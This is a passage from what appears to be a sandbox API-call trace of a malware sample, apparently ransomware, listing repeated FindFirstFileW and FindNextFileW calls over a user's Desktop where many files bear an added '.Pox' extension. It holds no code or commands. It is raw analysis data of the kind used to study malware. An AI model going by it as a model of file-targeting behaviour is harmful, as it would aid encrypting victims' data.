(in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", lpFindFileData=0x3ae340 | out: lpFindFileData=0x3ae340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cb5fe0, ftLastAccessTime.dwHighDateTime=0x1d53803, ftLastWriteTime.dwLowDateTime=0x28cb5fe0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4061c8 [0038.675] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cb5fe0, ftLastAccessTime.dwHighDateTime=0x1d53803, ftLastWriteTime.dwLowDateTime=0x28cb5fe0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0038.675] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8f58a80, ftCreationTime.dwHighDateTime=0x1d4d216, ftLastAccessTime.dwLowDateTime=0x9eba96d0, ftLastAccessTime.dwHighDateTime=0x1d4d552, ftLastWriteTime.dwLowDateTime=0x286504c0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x11ba0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1FQ_9d0LXe6pMvO2.rtf.Pox", cAlternateFileName="1FQ_9D~1.POX")) returned 1 [0038.675] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d296e30, ftCreationTime.dwHighDateTime=0x1d4d401, ftLastAccessTime.dwLowDateTime=0x3a416670, ftLastAccessTime.dwHighDateTime=0x1d4d115, ftLastWriteTime.dwLowDateTime=0x3a416670, ftLastWriteTime.dwHighDateTime=0x1d4d115, nFileSizeHigh=0x0, nFileSizeLow=0x14479, dwReserved0=0x0, dwReserved1=0x0, cFileName="2eA2OpRDysRpr2xv6.m4a", cAlternateFileName="2EA2OP~1.M4A")) returned 1 [0038.675] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9611880, ftCreationTime.dwHighDateTime=0x1d4c9e9, ftLastAccessTime.dwLowDateTime=0xe5b5d0d0, ftLastAccessTime.dwHighDateTime=0x1d4cae0, ftLastWriteTime.dwLowDateTime=0xe5b5d0d0, ftLastWriteTime.dwHighDateTime=0x1d4cae0, nFileSizeHigh=0x0, nFileSizeLow=0xf509, dwReserved0=0x0, dwReserved1=0x0, cFileName="2IEebvswkOP20ZmPaTRl.odp", cAlternateFileName="2IEEBV~1.ODP")) returned 1 [0038.676] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf5379f0, ftCreationTime.dwHighDateTime=0x1d4cfbd, ftLastAccessTime.dwLowDateTime=0x3003e2c0, ftLastAccessTime.dwHighDateTime=0x1d4ce7a, ftLastWriteTime.dwLowDateTime=0x286c28e0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0xec80, dwReserved0=0x0, dwReserved1=0x0, cFileName="2Xy0mJv5xwhx4K1K.mkv.Pox", cAlternateFileName="2XY0MJ~1.POX")) returned 1 [0038.676] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x876b7c80, ftCreationTime.dwHighDateTime=0x1d4c687, ftLastAccessTime.dwLowDateTime=0xf7684e80, ftLastAccessTime.dwHighDateTime=0x1d4c864, ftLastWriteTime.dwLowDateTime=0xf7684e80, ftLastWriteTime.dwHighDateTime=0x1d4c864, nFileSizeHigh=0x0, nFileSizeLow=0x4660, dwReserved0=0x0, dwReserved1=0x0, cFileName="3csTOhoBZSK.swf", cAlternateFileName="3CSTOH~1.SWF")) returned 1 [0038.676] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a974ad0, ftCreationTime.dwHighDateTime=0x1d4cd47, ftLastAccessTime.dwLowDateTime=0xe955410, ftLastAccessTime.dwHighDateTime=0x1d4d30d, ftLastWriteTime.dwLowDateTime=0x28865800, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x97b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="6oF3FL3YfrkND.bmp.Pox", cAlternateFileName="6OF3FL~1.POX")) returned 1 [0038.676] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fcea30, ftCreationTime.dwHighDateTime=0x1d4cff5, ftLastAccessTime.dwLowDateTime=0xeb645dd0, ftLastAccessTime.dwHighDateTime=0x1d4ce3c, ftLastWriteTime.dwLowDateTime=0x288fdd80, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0xc5d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="7C9V.jpg.Pox", cAlternateFileName="7C9VJP~1.POX")) returned 1 [0038.677] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c77a6e0, ftCreationTime.dwHighDateTime=0x1d4cde6, ftLastAccessTime.dwLowDateTime=0xf7e25640, ftLastAccessTime.dwHighDateTime=0x1d4d5a6, ftLastWriteTime.dwLowDateTime=0xf7e25640, ftLastWriteTime.dwHighDateTime=0x1d4d5a6, nFileSizeHigh=0x0, nFileSizeLow=0x690b, dwReserved0=0x0, dwReserved1=0x0, cFileName="9 Bj5iosU.wav", cAlternateFileName="9BJ5IO~1.WAV")) returned 1 [0038.677] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa96ea00, ftCreationTime.dwHighDateTime=0x1d4cd03, ftLastAccessTime.dwLowDateTime=0x3d2a3800, ftLastAccessTime.dwHighDateTime=0x1d4ca92, ftLastWriteTime.dwLowDateTime=0x3d2a3800, ftLastWriteTime.dwHighDateTime=0x1d4ca92, nFileSizeHigh=0x0, nFileSizeLow=0xced3, dwReserved0=0x0, dwReserved1=0x0, cFileName="CMEi.pps", cAlternateFileName="")) returned 1 [0038.677] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0038.677] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6a67250, ftCreationTime.dwHighDateTime=0x1d4cbcb, ftLastAccessTime.dwLowDateTime=0x3e8d5750, ftLastAccessTime.dwHighDateTime=0x1d4d54f, ftLastWriteTime.dwLowDateTime=0x3e8d5750, ftLastWriteTime.dwHighDateTime=0x1d4d54f, nFileSizeHigh=0x0, nFileSizeLow=0x3da7, dwReserved0=0x0, dwReserved1=0x0, cFileName="dRLDjJ.swf", cAlternateFileName="")) returned 1 [0038.677] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c999730, ftCreationTime.dwHighDateTime=0x1d4ceb8, ftLastAccessTime.dwLowDateTime=0xd07de150, ftLastAccessTime.dwHighDateTime=0x1d4ceda, ftLastWriteTime.dwLowDateTime=0x2894a040, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x134b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ENBmMMWK.bmp.Pox", cAlternateFileName="ENBMMM~1.POX")) returned 1 [0038.677] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4ddbec0, ftCreationTime.dwHighDateTime=0x1d4cc51, ftLastAccessTime.dwLowDateTime=0xf54fa3d0, ftLastAccessTime.dwHighDateTime=0x1d4d33d, ftLastWriteTime.dwLowDateTime=0x289701a0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x10760, dwReserved0=0x0, dwReserved1=0x0, cFileName="gH-zamZAJg.mp3.Pox", cAlternateFileName="GH-ZAM~1.POX")) returned 1 [0038.677] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0ee2d40, ftCreationTime.dwHighDateTime=0x1d4d1d7, ftLastAccessTime.dwLowDateTime=0xe528e990, ftLastAccessTime.dwHighDateTime=0x1d4d4e5, ftLastWriteTime.dwLowDateTime=0xe528e990, ftLastWriteTime.dwHighDateTime=0x1d4d4e5, nFileSizeHigh=0x0, nFileSizeLow=0x151ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="ICKBPik8.flv", cAlternateFileName="")) returned 1 [0038.677] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1ebac40, ftCreationTime.dwHighDateTime=0x1d4c9fe, ftLastAccessTime.dwLowDateTime=0x989a0550, ftLastAccessTime.dwHighDateTime=0x1d4cb2b, ftLastWriteTime.dwLowDateTime=0x289e25c0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x16860, dwReserved0=0x0, dwReserved1=0x0, cFileName="m4SvX-jeGXwW.mkv.Pox", cAlternateFileName="M4SVX-~1.POX")) returned 1 [0038.678] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcddf5a90, ftCreationTime.dwHighDateTime=0x1d4ce8b, ftLastAccessTime.dwLowDateTime=0x5c6f7bf0, ftLastAccessTime.dwHighDateTime=0x1d4d3d2, ftLastWriteTime.dwLowDateTime=0x28a7ab40, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x6d40, dwReserved0=0x0, dwReserved1=0x0, cFileName="O0y0hsLAoKxoA.mp3.Pox", cAlternateFileName="O0Y0HS~1.POX")) returned 1 [0038.678] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a8281a0, ftCreationTime.dwHighDateTime=0x1d4d373, ftLastAccessTime.dwLowDateTime=0x95a18ea0, ftLastAccessTime.dwHighDateTime=0x1d4cd14, ftLastWriteTime.dwLowDateTime=0x95a18ea0, ftLastWriteTime.dwHighDateTime=0x1d4cd14, nFileSizeHigh=0x0, nFileSizeLow=0x16fab, dwReserved0=0x0, dwReserved1=0x0, cFileName="RQ9 -66bCRPg.odp", cAlternateFileName="RQ9-66~1.ODP")) returned 1 [0038.678] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd24e9870, ftCreationTime.dwHighDateTime=0x1d4d2a5, ftLastAccessTime.dwLowDateTime=0x1bf10c20, ftLastAccessTime.dwHighDateTime=0x1d4d502, ftLastWriteTime.dwLowDateTime=0x28aa0ca0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x5ca0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sN3K33tDMKQaoIqJe.mp4.Pox", cAlternateFileName="SN3K33~1.POX")) returned 1 [0038.678] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x887d2840, ftCreationTime.dwHighDateTime=0x1d4d5a9, ftLastAccessTime.dwLowDateTime=0x24ca6ae0, ftLastAccessTime.dwHighDateTime=0x1d4c9c6, ftLastWriteTime.dwLowDateTime=0x24ca6ae0, ftLastWriteTime.dwHighDateTime=0x1d4c9c6, nFileSizeHigh=0x0, nFileSizeLow=0x87fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="sxImIod6M.m4a", cAlternateFileName="SXIMIO~1.M4A")) returned 1 [0038.678] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x36868070, ftCreationTime.dwHighDateTime=0x1d4d47a, ftLastAccessTime.dwLowDateTime=0x28d28400, ftLastAccessTime.dwHighDateTime=0x1d53803, ftLastWriteTime.dwLowDateTime=0x28d28400, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="T9ZgHii-", cAlternateFileName="")) returned 1 [0038.678] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x55265fc0, ftCreationTime.dwHighDateTime=0x1d4c618, ftLastAccessTime.dwLowDateTime=0x28f175e0, ftLastAccessTime.dwHighDateTime=0x1d53803, ftLastWriteTime.dwLowDateTime=0x28f175e0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tQYzvy44", cAlternateFileName="")) returned 1 [0038.678] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaa03290, ftCreationTime.dwHighDateTime=0x1d4d118, ftLastAccessTime.dwLowDateTime=0x3abf6060, ftLastAccessTime.dwHighDateTime=0x1d4c69e, ftLastWriteTime.dwLowDateTime=0x28b39220, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x139e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="wcRE.jpg.Pox", cAlternateFileName="WCREJP~1.POX")) returned 1 [0038.679] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d01ce90, ftCreationTime.dwHighDateTime=0x1d4d54b, ftLastAccessTime.dwLowDateTime=0x7107d870, ftLastAccessTime.dwHighDateTime=0x1d4d23b, ftLastWriteTime.dwLowDateTime=0x28b5f380, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0xb620, dwReserved0=0x0, dwReserved1=0x0, cFileName="XRPTN7Kw.png.Pox", cAlternateFileName="XRPTN7~1.POX")) returned 1 [0038.679] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2d476b0, ftCreationTime.dwHighDateTime=0x1d4cc77, ftLastAccessTime.dwLowDateTime=0x17a50f70, ftLastAccessTime.dwHighDateTime=0x1d4c7ad, ftLastWriteTime.dwLowDateTime=0x28c69d20, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0xaf80, dwReserved0=0x0, dwReserved1=0x0, cFileName="yjbKOP66PA6 t9xa78.bmp.Pox", cAlternateFileName="YJBKOP~1.POX")) returned 1 [0038.679] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5d050ed0, ftCreationTime.dwHighDateTime=0x1d4c956, ftLastAccessTime.dwLowDateTime=0x28f638a0, ftLastAccessTime.dwHighDateTime=0x1d53803, ftLastWriteTime.dwLowDateTime=0x28f638a0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Zh5KHKzPc6AOkC3JGPhN", cAlternateFileName="ZH5KHK~1")) returned 1 [0038.679] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4fa5d7a0, ftCreationTime.dwHighDateTime=0x1d4cabf, ftLastAccessTime.dwLowDateTime=0xe356290, ftLastAccessTime.dwHighDateTime=0x1d4c650, ftLastWriteTime.dwLowDateTime=0x28cb5fe0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x44b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZR4FkDMgSj24KiPo8.odt.Pox", cAlternateFileName="ZR4FKD~1.POX")) returned 1 [0038.679] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e75a920, ftCreationTime.dwHighDateTime=0x1d4cf39, ftLastAccessTime.dwLowDateTime=0x99ddca50, ftLastAccessTime.dwHighDateTime=0x1d4ce28, ftLastWriteTime.dwLowDateTime=0x99ddca50, ftLastWriteTime.dwHighDateTime=0x1d4ce28, nFileSizeHigh=0x0, nFileSizeLow=0x134df, dwReserved0=0x0, dwReserved1=0x0, cFileName="Zu7U9XrkG49K.wav", cAlternateFileName="ZU7U9X~1.WAV")) returned 1 [0038.679] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0038.680] FindClose (in: hFindFile=0x4061c8 | out: hFindFile=0x4061c8) returned 1 [0038.680] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5d8) returned 1 [0038.680] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5e4) returned 1 [0038.680] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae618) returned 1 [0038.680] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x3ae120, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0038.680] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", nBufferLength=0x105, lpBuffer=0x3ae0f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpFilePart=0x0) returned 0x26 [0038.680] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", lpFindFileData=0x3ae340 | out: lpFindFileData=0x3ae340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cb5fe0, ftLastAccessTime.dwHighDateTime=0x1d53803, ftLastWriteTime.dwLowDateTime=0x28cb5fe0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4061c8 [0038.680] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cb5fe0, ftLastAccessTime.dwHighDateTime=0x1d53803, ftLastWriteTime.dwLowDateTime=0x28cb5fe0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0038.680] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8f58a80, ftCreationTime.dwHighDateTime=0x1d4d216, ftLastAccessTime.dwLowDateTime=0x9eba96d0, ftLastAccessTime.dwHighDateTime=0x1d4d552, ftLastWriteTime.dwLowDateTime=0x286504c0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x11ba0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1FQ_9d0LXe6pMvO2.rtf.Pox", cAlternateFileName="1FQ_9D~1.POX")) returned 1 [0038.680] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d296e30, ftCreationTime.dwHighDateTime=0x1d4d401, ftLastAccessTime.dwLowDateTime=0x3a416670, ftLastAccessTime.dwHighDateTime=0x1d4d115, ftLastWriteTime.dwLowDateTime=0x3a416670, ftLastWriteTime.dwHighDateTime=0x1d4d115, nFileSizeHigh=0x0, nFileSizeLow=0x14479, dwReserved0=0x0, dwReserved1=0x0, cFileName="2eA2OpRDysRpr2xv6.m4a", cAlternateFileName="2EA2OP~1.M4A")) returned 1 [0038.681] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9611880, ftCreationTime.dwHighDateTime=0x1d4c9e9, ftLastAccessTime.dwLowDateTime=0xe5b5d0d0, ftLastAccessTime.dwHighDateTime=0x1d4cae0, ftLastWriteTime.dwLowDateTime=0xe5b5d0d0, ftLastWriteTime.dwHighDateTime=0x1d4cae0, nFileSizeHigh=0x0, nFileSizeLow=0xf509, dwReserved0=0x0, dwReserved1=0x0, cFileName="2IEebvswkOP20ZmPaTRl.odp", cAlternateFileName="2IEEBV~1.ODP")) returned 1 [0038.681] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf5379f0, ftCreationTime.dwHighDateTime=0x1d4cfbd, ftLastAccessTime.dwLowDateTime=0x3003e2c0, ftLastAccessTime.dwHighDateTime=0x1d4ce7a, ftLastWriteTime.dwLowDateTime=0x286c28e0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0xec80, dwReserved0=0x0, dwReserved1=0x0, cFileName="2Xy0mJv5xwhx4K1K.mkv.Pox", cAlternateFileName="2XY0MJ~1.POX")) returned 1 [0038.681] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x876b7c80, ftCreationTime.dwHighDateTime=0x1d4c687, ftLastAccessTime.dwLowDateTime=0xf7684e80, ftLastAccessTime.dwHighDateTime=0x1d4c864, ftLastWriteTime.dwLowDateTime=0xf7684e80, ftLastWriteTime.dwHighDateTime=0x1d4c864, nFileSizeHigh=0x0, nFileSizeLow=0x4660, dwReserved0=0x0, dwReserved1=0x0, cFileName="3csTOhoBZSK.swf", cAlternateFileName="3CSTOH~1.SWF")) returned 1 [0038.681] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a974ad0, ftCreationTime.dwHighDateTime=0x1d4cd47, ftLastAccessTime.dwLowDateTime=0xe955410, ftLastAccessTime.dwHighDateTime=0x1d4d30d, ftLastWriteTime.dwLowDateTime=0x28865800, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x97b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="6oF3FL3YfrkND.bmp.Pox", cAlternateFileName="6OF3FL~1.POX")) returned 1 [0038.681] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fcea30, ftCreationTime.dwHighDateTime=0x1d4cff5, ftLastAccessTime.dwLowDateTime=0xeb645dd0, ftLastAccessTime.dwHighDateTime=0x1d4ce3c, ftLastWriteTime.dwLowDateTime=0x288fdd80, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0xc5d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="7C9V.jpg.Pox", cAlternateFileName="7C9VJP~1.POX")) returned 1 [0038.682] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c77a6e0, ftCreationTime.dwHighDateTime=0x1d4cde6, ftLastAccessTime.dwLowDateTime=0xf7e25640, ftLastAccessTime.dwHighDateTime=0x1d4d5a6, ftLastWriteTime.dwLowDateTime=0xf7e25640, ftLastWriteTime.dwHighDateTime=0x1d4d5a6, nFileSizeHigh=0x0, nFileSizeLow=0x690b, dwReserved0=0x0, dwReserved1=0x0, cFileName="9 Bj5iosU.wav", cAlternateFileName="9BJ5IO~1.WAV")) returned 1 [0038.682] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa96ea00, ftCreationTime.dwHighDateTime=0x1d4cd03, ftLastAccessTime.dwLowDateTime=0x3d2a3800, ftLastAccessTime.dwHighDateTime=0x1d4ca92, ftLastWriteTime.dwLowDateTime=0x3d2a3800, ftLastWriteTime.dwHighDateTime=0x1d4ca92, nFileSizeHigh=0x0, nFileSizeLow=0xced3, dwReserved0=0x0, dwReserved1=0x0, cFileName="CMEi.pps", cAlternateFileName="")) returned 1 [0038.682] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0038.682] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6a67250, ftCreationTime.dwHighDateTime=0x1d4cbcb, ftLastAccessTime.dwLowDateTime=0x3e8d5750, ftLastAccessTime.dwHighDateTime=0x1d4d54f, ftLastWriteTime.dwLowDateTime=0x3e8d5750, ftLastWriteTime.dwHighDateTime=0x1d4d54f, nFileSizeHigh=0x0, nFileSizeLow=0x3da7, dwReserved0=0x0, dwReserved1=0x0, cFileName="dRLDjJ.swf", cAlternateFileName="")) returned 1 [0038.682] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c999730, ftCreationTime.dwHighDateTime=0x1d4ceb8, ftLastAccessTime.dwLowDateTime=0xd07de150, ftLastAccessTime.dwHighDateTime=0x1d4ceda, ftLastWriteTime.dwLowDateTime=0x2894a040, 